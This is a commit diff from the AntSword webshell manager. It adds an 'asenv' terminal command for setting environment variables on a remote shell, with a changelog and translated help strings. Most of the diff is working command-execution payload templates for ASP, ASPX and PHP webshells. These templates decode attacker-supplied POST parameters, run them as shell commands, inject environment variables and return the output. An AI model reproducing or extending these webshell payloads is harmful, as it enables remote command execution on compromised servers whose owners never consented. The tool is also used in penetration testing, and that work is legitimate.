(Enhance: Terminal) 新增 `asenv` 本地指令, 用于手动设置当前终端下的环境变量

9085af9f · Medicean · 235f2c3c · 9085af9f · 9085af9f · 9085af9f
Commit 9085af9f authored Dec 03, 2019 by Medicean
10 changed files
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,6 +7,16 @@
 ### 核心

 * 修复全局过滤 xss 时 text 和 buff 过滤规则不一致问题
+* core.command.exec 增加第 3个参数 env
+
+ 格式为: `key1|||askey|||val1|||asline|||key2|||askey|||val2|||asline|||`
+ 
+ 对应的环境变量为:
+
+```
+key1=val1
+key2=val2
+```

 ### 数据管理

@@ -28,6 +38,20 @@

 * 新建文件默认内容更改为 `#Halo AntSword!`

+### 虚拟终端
+
+* 新增 `asenv` 本地指令, 用于手动设置当前终端下的环境变量
+
+Linux:
+
+![terminal_asenv_1.png](https://i.loli.net/2019/12/03/k3AgCmlNbIM8QDZ.png)
+
+Windows:
+
+![terminal_asenv_2.png](https://i.loli.net/2019/12/03/uzjvAgRT1Bdbkhw.png)
+
+> 注意: asp 下设置之后, 当前机器上的IIS子进程都会受影响, 过一段时间子进程退出后正常
+
 ### 其它

 * ACE 编辑器增加 `ace/mode/antswordjwt` 语法模式, 支持 JWT Token 语法高亮

--- a/source/core/asp/template/command.js
+++ b/source/core/asp/template/command.js
@@ -2,11 +2,29 @@
 * 命令执行模板
 */

-module.exports = (arg1, arg2) => ({
+module.exports = (arg1, arg2, arg3) => ({
  exec: {
-    _: `Set X=CreateObject("wscript.shell").exec(""""&bd(Request("${arg1}"))&""" /c """&bd(Request("${arg2}"))&""""):If Err Then:S="[Err] "&Err.Description:Err.Clear:Else:O=X.StdOut.ReadAll():E=X.StdErr.ReadAll():S=O&E:End If:Response.write(S)`,
+    _: `Set PutEnv=CreateObject("WScript.Shell").Environment("Process"):
+    envstr=Split(""&bd(Request("${arg3}"))&"", "|||asline|||"):
+    For Each envline in envstr:
+      If Len(envline)>0 Then:
+        ss=Split(envline, "|||askey|||"):
+        PutEnv(ss(0))=ss(1):
+      End If:
+    Next:
+    Set X=CreateObject("wscript.shell").exec(""""&bd(Request("${arg1}"))&""" /c """&bd(Request("${arg2}"))&""""):
+    If Err Then:
+      S="[Err] "&Err.Description:
+      Err.Clear:
+    Else:
+      O=X.StdOut.ReadAll():
+      E=X.StdErr.ReadAll():
+      S=O&E:
+    End If:
+    Response.write(S)`.replace(/\n\s+/g, ''),
    [arg1]: "#{hex::bin}",
-    [arg2]: "#{hex::cmd}"
+    [arg2]: "#{hex::cmd}",
+    [arg3]: "#{hex::env}",
  },
  listcmd: {
    _: `AA=Split(""&bd(Request("${arg1}"))&"",","):

--- a/source/core/aspx/template/command.js
+++ b/source/core/aspx/template/command.js
@@ -2,11 +2,36 @@
 * 命令执行模板
 */

-module.exports = (arg1, arg2) => ({
+module.exports = (arg1, arg2, arg3) => ({
  exec: {
-    _: `var c=new System.Diagnostics.ProcessStartInfo(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String(Request.Item["${arg1}"])));var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c "+System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String(Request.Item["${arg2}"]));e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd()+EI.ReadToEnd());`,
+    _: `var c=new System.Diagnostics.ProcessStartInfo(System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String(Request.Item["${arg1}"])));
+    var e=new System.Diagnostics.Process();
+    var out:System.IO.StreamReader,EI:System.IO.StreamReader;
+    c.UseShellExecute=false;
+    c.RedirectStandardOutput=true;
+    c.RedirectStandardError=true;
+    e.StartInfo=c;
+    c.Arguments="/c "+System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String(Request.Item["${arg2}"]));
+    if(Request.Item["${arg3}"]) {
+      var envstr = System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String(Request.Item["${arg3}"]));
+      var envarr = envstr.split("|||asline|||");
+      var i;
+      for (var i in envarr) {
+        var ss = envarr[i].split("|||askey|||");
+        if (ss.length != 2) {
+          continue;
+        }
+        c.EnvironmentVariables.Add(ss[0],ss[1]);
+      }
+    }
+    e.Start();
+    out=e.StandardOutput;
+    EI=e.StandardError;
+    e.Close();
+    Response.Write(out.ReadToEnd() + EI.ReadToEnd());`.replace(/\n\s+/g, ''),
    [arg1]: "#{base64::bin}",
-    [arg2]: "#{base64::cmd}"
+    [arg2]: "#{base64::cmd}",
+    [arg3]: "#{base64::env}"
  },
  listcmd: {
    _: `var binarr=System.Text.Encoding.GetEncoding("!{ANT::ENDOCE}").GetString(System.Convert.FromBase64String(Request.Item["${arg1}"]));

--- a/source/core/custom/template/command.js
+++ b/source/core/custom/template/command.js
@@ -6,7 +6,8 @@ module.exports = () => ({
  exec: {
    _: 'M',
    'z1': '#{bin}',
-    'z2': '#{cmd}'
+    'z2': '#{cmd}',
+    'z3': '#{env}'
  },
  listcmd: {
    _: 'Y',

--- a/source/core/php/template/command.js
+++ b/source/core/php/template/command.js
@@ -2,10 +2,11 @@
 * 虚拟终端命令执行
 */

-module.exports = (arg1, arg2) => ({
+module.exports = (arg1, arg2, arg3) => ({
  exec: {
    _: `$p=base64_decode($_POST["${arg1}"]);
      $s=base64_decode($_POST["${arg2}"]);
+      $envstr=@base64_decode($_POST["${arg3}"]);
      $d=dirname($_SERVER["SCRIPT_FILENAME"]);
      $c=substr($d,0,1)=="/"?"-c \\"{$s}\\"":"/c \\"{$s}\\"";
      if(substr($d,0,1)=="/"){
@@ -13,6 +14,14 @@ module.exports = (arg1, arg2) => ({
      }else{
        @putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
      }
+      if(!empty($envstr)){
+        $envarr=explode("|||asline|||", $envstr);
+        foreach($envarr as $v) {
+          if (!empty($v)) {
+            @putenv(str_replace("|||askey|||", "=", $v));
+          }
+        }
+      }
      $r="{$p} {$c}";
      function fe($f){
        $d=explode(",",@ini_get("disable_functions"));
@@ -94,7 +103,8 @@ module.exports = (arg1, arg2) => ({
      $ret=@runcmd($r." 2>&1");
      print ($ret!=0)?"ret={$ret}":"";`.replace(/\n\s+/g, ''),
    [arg1]: "#{base64::bin}",
-    [arg2]: "#{base64::cmd}"
+    [arg2]: "#{base64::cmd}",
+    [arg3]: "#{base64::env}"
  },
  listcmd: {
    _: `$arr=explode(",",base64_decode($_POST["${arg1}"]));

--- a/source/language/en.js
+++ b/source/language/en.js
@@ -222,6 +222,7 @@ module.exports = {
    ascmd: {
      help: 'Enter ashelp to view local commands',
      ashelp: `Usage:
+ asenv [Key=Value]\t\tSet or Display Environment Variables, eg: asenv AAA=BBB
 ascmd [file]\t\tExecute the command with file, eg: ascmd /bin/bash
 aslistcmd\t\tList available command interpreters
 aspowershell [on|off]\t\tEnable/Disable PowerShell mode, eg: aspowershell on

--- a/source/language/zh.js
+++ b/source/language/zh.js
@@ -222,6 +222,7 @@ module.exports = {
    ascmd: {
      help: '输入 ashelp 查看本地命令',
      ashelp: `使用帮助:
+ asenv [Key=Value]\t\t设置或显示环境变量, eg: asenv AAA=BBB
 ascmd [file]\t\t指定file来执行命令, eg: ascmd /bin/bash
 aslistcmd\t\t列出可使用的命令解释器
 aspowershell [on|off]\t\t启用/关闭PowerShell模式, eg: aspowershell on

--- a/source/language/zh_hk.js
+++ b/source/language/zh_hk.js
@@ -221,6 +221,7 @@ module.exports = {
    ascmd: {
      help: '輸入 ashelp 查看本地命令',
      ashelp: `使用幫助:
+ asenv[Key=Value]\t\t設置或顯示環境變量, eg: asenv AAA=BBB
 ascmd [file]\t\t指定file來執行命令, eg: ascmd /bin/bash
 aslistcmd\t\t列出可使用的命令解釋器
 aspowershell [on|off]\t\t啟用/關閉PowerShell模式, eg: aspowershell on

--- a/source/language/zh_tw.js
+++ b/source/language/zh_tw.js
@@ -221,6 +221,7 @@ module.exports = {
    ascmd: {
      help: '輸入 ashelp 查看本地命令',
      ashelp: `使用幫助:
+ asenv[Key=Value]\t\t設置或顯示環境變量, eg: asenv AAA=BBB
 ascmd [file]\t\t指定file來執行命令, eg: ascmd /bin/bash
 aslistcmd\t\t列出可使用的命令解釋器
 aspowershell [on|off]\t\t啟用/關閉PowerShell模式, eg: aspowershell on

--- a/source/modules/terminal/index.js
+++ b/source/modules/terminal/index.js
@@ -50,6 +50,7 @@ class Terminal {
    this.sess_powershell = null;
    this.core = new antSword['core'][opts['type']](opts);
    this.cache = new antSword['CacheManager'](this.opts['_id']);
+    this.asenvironmet = {};

    this
      .getInformation()
@@ -274,6 +275,19 @@ class Terminal {
        }
        return;
      }
+      if (cmd.substr(0, 5) === 'asenv') {
+        var envstr = cmd.substr(5).trim();
+        if (envstr.length > 0 && envstr.indexOf('=') > 0) {
+          var k = envstr.substr(0, envstr.indexOf('=')).trim();
+          var v = envstr.substr(envstr.indexOf('=') + 1).trim();
+          this.asenvironmet[k] = v;
+        } else {
+          Object.keys(this.asenvironmet).map((k) => {
+            term.echo(`${antSword.noxss(k)}=${antSword.noxss(this.asenvironmet[k])}`);
+          });
+        }
+        return;
+      }
      term.pause();
      // 是否有缓存
      let cacheTag = 'command-' + Buffer
@@ -308,7 +322,10 @@ class Terminal {
        .core
        .request(this.core.command.exec({
          cmd: this.parseCmd(cmd, this.path),
-          bin: _bin
+          bin: _bin,
+          env: Object.keys(this.asenvironmet).map((k) => {
+            return `${k}|||askey|||${this.asenvironmet[k]}|||asline|||`;
+          }).join(''),
        }))
        .then((ret) => {
          let _ = antSword.unxss(ret['text'], false);
@@ -365,7 +382,7 @@ class Terminal {
      exit: false,
      // < 1.0.0 时使用3个参数 completion: (term, value, callback) => {}
      completion: (value, callback) => {
-        callback(['ashelp', 'ascmd', 'aslistcmd', 'aspowershell', 'quit', 'exit'].concat(
+        callback(['asenv', 'ashelp', 'ascmd', 'aslistcmd', 'aspowershell', 'quit', 'exit'].concat(
          this.isWin ? [
            'dir', 'whoami', 'net', 'ipconfig', 'netstat', 'cls', 'wscript', 'nslookup', 'copy', 'del', 'ren', 'md', 'type', 'ping'
          ] : [